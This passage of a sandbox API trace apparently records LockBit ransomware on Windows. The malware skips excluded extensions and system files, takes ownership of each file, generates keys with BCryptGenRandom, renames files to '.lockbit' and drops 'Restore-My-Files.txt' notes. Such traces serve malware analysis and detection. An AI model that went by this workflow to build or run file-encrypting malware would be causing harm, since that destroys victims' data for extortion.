(lpString1=".reg", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.553] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="pushplaysubpicture.png") returned 1 [0085.553] lstrcmpiW (lpString1="ntldr", lpString2="pushplaysubpicture.png") returned -1 [0085.553] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="pushplaysubpicture.png") returned -1 [0085.553] lstrcmpiW (lpString1="bootsect.bak", lpString2="pushplaysubpicture.png") returned -1 [0085.553] lstrcmpiW (lpString1="autorun.inf", lpString2="pushplaysubpicture.png") returned -1 [0085.553] lstrcmpiW (lpString1="thumbs.db", lpString2="pushplaysubpicture.png") returned 1 [0085.553] lstrcmpiW (lpString1="iconcache.db", lpString2="pushplaysubpicture.png") returned -1 [0085.553] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.553] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png") returned=".png" [0085.553] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.553] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.553] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.553] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.554] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.554] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.554] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.554] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.554] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.554] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.554] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.555] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.555] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png.lockbit") returned 80 [0085.555] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.555] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.555] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.556] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.556] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.556] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.556] RtlFreeAnsiString (AnsiString="\\") [0085.556] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0085.556] malloc (_Size=0x200) returned 0x77d800 [0085.556] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.556] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.556] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.557] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.557] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.557] CloseHandle (hObject=0x3c4) returned 1 [0085.557] free (_Block=0x77d800) [0085.557] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0085.558] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.558] malloc (_Size=0x40068) returned 0x3df0128 [0085.559] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3df0140 | out: lpFileSize=0x3df0140*=2962) returned 1 [0085.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0085.560] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0085.560] ReadFile (in: hFile=0x3c4, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0085.577] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.577] malloc (_Size=0xb6) returned 0x77d800 [0085.577] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0085.577] free (_Block=0x77d800) [0085.577] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.577] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.578] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.578] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0x0, dwReserved1=0x0, cFileName="push_item.png", cAlternateFileName="")) returned 1 [0085.578] lstrcmpiW (lpString1=".", lpString2="push_item.png") returned -1 [0085.578] lstrcmpiW (lpString1="..", lpString2="push_item.png") returned -1 [0085.578] PathFindExtensionW (pszPath="push_item.png") returned=".png" [0085.578] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.578] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.578] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.579] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.579] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.579] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.579] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.579] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.579] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.580] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.580] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.580] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.580] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.580] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.580] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="push_item.png") returned 1 [0085.580] lstrcmpiW (lpString1="ntldr", lpString2="push_item.png") returned -1 [0085.580] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="push_item.png") returned -1 [0085.580] lstrcmpiW (lpString1="bootsect.bak", lpString2="push_item.png") returned -1 [0085.580] lstrcmpiW (lpString1="autorun.inf", lpString2="push_item.png") returned -1 [0085.580] lstrcmpiW (lpString1="thumbs.db", lpString2="push_item.png") returned 1 [0085.581] lstrcmpiW (lpString1="iconcache.db", lpString2="push_item.png") returned -1 [0085.581] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.581] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png") returned=".png" [0085.581] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.581] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.581] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.581] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.582] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.582] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.582] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.582] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.582] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.582] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png.lockbit") returned 71 [0085.582] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.583] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.583] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.583] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.583] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.584] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.584] RtlFreeAnsiString (AnsiString="\\") [0085.584] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0085.584] malloc (_Size=0x200) returned 0x77d800 [0085.584] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.584] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.584] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.584] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.585] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.585] CloseHandle (hObject=0x3ac) returned 1 [0085.585] free (_Block=0x77d800) [0085.585] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.585] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.585] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.585] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2928) returned 1 [0085.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.587] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.631] malloc (_Size=0xa4) returned 0x77d800 [0085.631] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0085.631] free (_Block=0x77d800) [0085.631] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.631] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.631] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.632] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="push_title.png", cAlternateFileName="")) returned 1 [0085.632] lstrcmpiW (lpString1=".", lpString2="push_title.png") returned -1 [0085.632] lstrcmpiW (lpString1="..", lpString2="push_title.png") returned -1 [0085.632] PathFindExtensionW (pszPath="push_title.png") returned=".png" [0085.632] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.632] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.632] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.633] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.633] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.634] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.634] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.634] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.634] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.634] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.634] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="push_title.png") returned 1 [0085.634] lstrcmpiW (lpString1="ntldr", lpString2="push_title.png") returned -1 [0085.634] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="push_title.png") returned -1 [0085.634] lstrcmpiW (lpString1="bootsect.bak", lpString2="push_title.png") returned -1 [0085.634] lstrcmpiW (lpString1="autorun.inf", lpString2="push_title.png") returned -1 [0085.634] lstrcmpiW (lpString1="thumbs.db", lpString2="push_title.png") returned 1 [0085.634] lstrcmpiW (lpString1="iconcache.db", lpString2="push_title.png") returned -1 [0085.634] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.634] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png") returned=".png" [0085.634] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.634] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.634] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.635] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.635] lstrcmpiW 